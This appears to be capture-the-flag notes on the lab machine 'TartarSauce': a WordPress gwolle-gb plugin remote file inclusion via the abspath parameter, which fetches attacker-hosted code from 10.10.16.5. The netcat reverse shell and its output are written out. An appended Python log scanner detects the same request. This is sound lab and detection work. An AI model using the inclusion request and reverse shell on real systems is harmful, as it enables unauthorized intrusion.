5 :80 monstra
# exploring the website
Logged In > System > Information > Directory Permissions
/var/www/html/webservices/monstra-3.0.4/storage Writable
/var/www/html/webservices/monstra-3.0.4/tmp Writable
/var/www/html/webservices/monstra-3.0.4/backups Writable
/var/www/html/webservices/monstra-3.0.4/public Writable
/var/www/html/webservices/monstra-3.0.4/plugins Writable
/var/www/html/webservices/monstra-3.0.4/admin Writable
# running aggressive plugin scan
[+] gwolle-gb
| Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
| [!] The version is out of date, the latest version is 4.1.2
| Version: 2.3.10 (100% confidence)
Using https://www.exploit-db.com/exploits/38861
# the vulnerable page requests wp-load.php from the URL given in abspath and executes it
10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.5/
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.88] 40762
SOCKET: Shell has connected! PID: 1854
whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
TartarSauce
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 athlon i686 GNU/Linux
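Detection side of the abspath request above, as an added example that is not part of the original notes: it scans web access logs for a path parameter that carries a remote URL instead of a local directory. The combined access-log format, the `remote_include_hits` name and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format line: client ident user [time] "METHOD target PROTO" status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# A value that points off-host: scheme://host or protocol-relative //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)
# Parameters expected to hold a filesystem path; abspath is the one on this page
PATH_PARAMS = {"abspath"}

def remote_include_hits(lines):
    """Return (client_ip, target, param, value) for each request whose
    path parameter holds a remote URL instead of a local path."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, _method, target, _status = m.groups()
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for name, values in query.items():
            if name.lower() not in PATH_PARAMS:
                continue
            for value in values:  # parse_qs has already percent-decoded
                if REMOTE_RE.match(value):
                    hits.append((client, target, name, value))
    return hits

# Constructed sample log lines (timestamps and the 192.0.2.10 client are made up)
PLUGIN = "/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"
SAMPLE_LOG = [
    f'10.10.16.5 - - [01/Jan/2024:10:00:00 +0000] "GET {PLUGIN}?abspath=http://10.10.16.5/ HTTP/1.1" 200 0',
    f'10.10.16.5 - - [01/Jan/2024:10:00:05 +0000] "GET {PLUGIN}?abspath=http%3A%2F%2F10.10.16.5%2F HTTP/1.1" 200 0',
    f'192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET {PLUGIN}?abspath=/var/www/html/webservices/wp/ HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2024:10:02:00 +0000] "GET /webservices/wp/index.php?p=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, target, name, value in remote_include_hits(SAMPLE_LOG):
        print(f"{client} {name}={value!r} in {target}")
```

The percent-encoded variant is caught because the check runs on the decoded parameter value, not on the raw request line.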